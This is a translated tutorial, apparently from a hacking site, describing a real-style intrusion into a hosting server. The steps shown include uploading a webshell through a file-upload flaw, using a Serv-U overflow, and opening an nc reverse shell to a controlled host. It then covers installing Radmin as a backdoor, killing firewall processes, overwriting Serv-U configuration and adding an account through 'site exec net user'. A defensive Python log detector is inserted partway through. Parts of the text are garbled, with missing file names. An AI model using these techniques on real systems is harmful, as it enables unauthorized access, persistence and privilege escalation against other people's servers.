SoFunction
Updated on 2025-04-13

How a Webshell Bypasses a Firewall to Escalate Privileges

This article focuses on escalating webshell privileges and bypassing the firewall. Experts, please don't laugh.
Enough preamble; let's get to the point.
First, the target: ***.com, an ordinary virtual host. Obtaining a webshell through an Upfile (upload) vulnerability should not be difficult for you. This time the webshell did not come from DVBBS; rather, the upload filtering of Free Power 3.6 is not strict. ***.com/lemon/ runs a Free Power 3.6 article system. Xr uses it and uploads a web *. Anyone who has used shark knows that this amounts to uploading the contents of an ASP *. So I uploaded Ocean 2005a and successfully obtained a webshell.
Test the permissions: run set in cmd to get some information about the host. The system disk is D:, which also shows that our webshell has execute permission. Then what is on the C: drive? Is it a dual-boot system? After browsing, I found no system files, only some junk files. Never mind; checking further, virtual hosts usually run Serv-U, and this one is no exception: version 5.0.0.8.
Idea: upload the Serv-U local overflow file and use nc to reverse connect to obtain a system shell. Have you noticed that the upload component of Ocean 2005a is not easy to use? It doesn't matter. A component-free upload script was modified with rain; there are 3 files in total, and. It is used locally, uploading into the same folder. The link address in the modified version is ***.com/lemon/, and then you can upload.
After uploading to H:\long\sun***\lemon (the website directory), I found there was no execute permission. It doesn't matter: in my experience, D:\Documents and Settings\All Users\ usually has execute permission on an ordinary system. So I wanted to copy the file there, but found that our webshell has no write permission on the D: drive.
D:\program files\serv-u\ can be browsed but not modified. Do we need to crack the Serv-U password? I'd rather not.
No reason to be discouraged. I suddenly wondered why the system was not placed on drive C. Could drive C be a FAT32 partition? A note here: if the host has a Win98 system disk, 99% of the time it is FAT32. We have also encountered hosts with Ghost installed; to make backups easy under DOS, the backup disk is generally a FAT partition. If the system disk is a FAT32 partition, the website has no security at all, because FAT32 has no file permissions. Although C: is not the system drive, we have execute permission on it. Haha, copy and to c:\, run " -e 202.*.*.* 888", where 202.*.*.* is our broiler (controlled host), on which we had already run nc -l -p 888.
We successfully obtained a system shell connection. (It looks simple, but in fact we hit setbacks here. Some versions of nc do not have the -e parameter, and I had assumed every nc in the world was the same. Later I found that different nc versions would not connect to each other properly and produced garbled output, so they could not be used. Because of this I uploaded n times, made n mistakes and felt stupid n times before finally succeeding. Being a hacker really requires patience and perseverance.)
While we were happy, we were still not satisfied, because this shell was too slow. So I wanted to use Radmin, which we use most often; in fact the administrator can find r_server by pressing Ctrl+Alt+Del and checking the process list, but I still like to use it because it is not detected. OK: upload r_server.exe to H:\long\sun***\lemon, then use the nc shell just obtained to copy it to d:\winnt\system32\, and run in turn: r_server /install , net start r_server , r_server /pass:rain /save .
After a long wait, it finally reported success. I connected with Radmin and found that the connection failed. Haha, I forgot there is a firewall. Upload pslist and pskill and find BlackICE, *s, etc. Although we could log in after killing them, it still would not work after the server restarted, so that is not a long-term solution. The firewall does not block ports 21, 80, etc., so our thinking returns to Serv-U. Download it, overwrite the local copy, add a system account with username xr and password rain in Serv-U on the local machine, with all permissions. Then use the old method: upload it and use the shell to write it into D:\program files\serv-u\, overwriting the original. Although I waited a long time, it succeeded, so I connected with FlashFXP and got a 530 error. Depressed: why did it fail again? (Based on experience this should work, so why can't I figure it out? Please advise.)
No matter what, restarting Serv-U should make it OK. How to restart it? At first we wanted to restart the system with shutdown, but then we would lose the nc shell and might be discovered. Then my eyes lit up: don't we have pskill? I had just used pslist to find this process: ServUDaemon . Kill it. Then run D:\program files\serv-u\  , please note that it is not .
OK, here we go: ftp in, ls, haha, the system disk is under my control. Can we run system commands? Yes, like this:
ftp>quote site exec net user xr rain /add 
Run net user from the webshell and you can see that the account was added successfully.
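The step above is exactly what a defender watching an FTP server should be alerting on: SITE EXEC turns the FTP daemon into a command runner, and an account-creation payload behind it is the clearest signal of the misuse described in this article. As an added example, not code from the article or from Serv-U, here is a small Python detector that scans FTP command log lines for SITE EXEC and rates account or group manipulation as high severity. The log lines and their "[session] timestamp ip command" layout are constructed for this example; a real deployment would adapt the line regex to the server's actual log format.

```python
import re
from dataclasses import dataclass

# Constructed sample FTP command log (not from the article; the layout is an
# assumption for this example, not Serv-U's real log format).
SAMPLE_LOG = """\
[1] 2005-03-01 02:14:07 198.51.100.7 USER xr
[1] 2005-03-01 02:14:08 198.51.100.7 PASS ****
[1] 2005-03-01 02:14:10 198.51.100.7 CWD /
[1] 2005-03-01 02:14:12 198.51.100.7 LIST
[1] 2005-03-01 02:14:30 198.51.100.7 SITE EXEC net user xr rain /add
[1] 2005-03-01 02:14:45 198.51.100.7 SITE EXEC net localgroup administrators xr /add
[2] 2005-03-01 02:20:01 203.0.113.9 USER webmaster
[2] 2005-03-01 02:20:05 203.0.113.9 STOR index.asp
[2] 2005-03-01 02:21:00 203.0.113.9 SITE CHMOD 644 index.asp
"""

# One log line: "[session] date time client-ip raw-command"
LINE_RE = re.compile(
    r"^\[(?P<session>\d+)\]\s+(?P<ts>\S+ \S+)\s+(?P<ip>\S+)\s+(?P<cmd>.*)$"
)

# Payloads that create accounts or change group membership are the worst case:
# "net user ... /add" and "net localgroup ... /add" (case-insensitive).
HIGH_RISK_RE = re.compile(r"\bnet\s+(user|localgroup)\b.*\s/add\b", re.IGNORECASE)


@dataclass
class Finding:
    session: str
    ts: str
    ip: str
    command: str
    severity: str  # "high" for account/group changes, "medium" for any other SITE EXEC


def parse(log_text):
    """Yield one dict per well-formed log line; unparseable lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_site_exec(log_text):
    """Return a Finding for every SITE EXEC command in the log, in log order."""
    findings = []
    for rec in parse(log_text):
        cmd = rec["cmd"].strip()
        parts = cmd.split(None, 2)  # ["SITE", "EXEC", "<payload>"]
        if len(parts) >= 2 and parts[0].upper() == "SITE" and parts[1].upper() == "EXEC":
            payload = parts[2] if len(parts) == 3 else ""
            severity = "high" if HIGH_RISK_RE.search(payload) else "medium"
            findings.append(Finding(rec["session"], rec["ts"], rec["ip"], cmd, severity))
    return findings


def summarize(findings):
    """Group findings by client IP so one attacker session becomes one alert."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f.ip, []).append(f)
    return by_ip


if __name__ == "__main__":
    for ip, hits in summarize(find_site_exec(SAMPLE_LOG)).items():
        worst = max(h.severity for h in hits)  # "medium" < "high" is not lexical; compute explicitly
        worst = "high" if any(h.severity == "high" for h in hits) else "medium"
        print(f"{ip}: {len(hits)} SITE EXEC command(s), worst severity {worst}")
        for h in hits:
            print(f"  [{h.severity}] session {h.session} at {h.ts}: {h.command}")
```

The split on the first two tokens rather than a substring match keeps SITE CHMOD and similar legitimate SITE subcommands out of the findings, while the case-insensitive payload pattern still catches variations in spelling of the net command. On a server where SITE EXEC has no business purpose at all, the right mitigation is to disable the command (or the per-account execute permission) outright and treat any occurrence as an incident.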
The entire intrusion ended here, and I cleaned up afterwards. Now for the discussion. In fact there are many good rootkits that can break through a firewall, but we think the services the system itself already provides make the safest backdoor.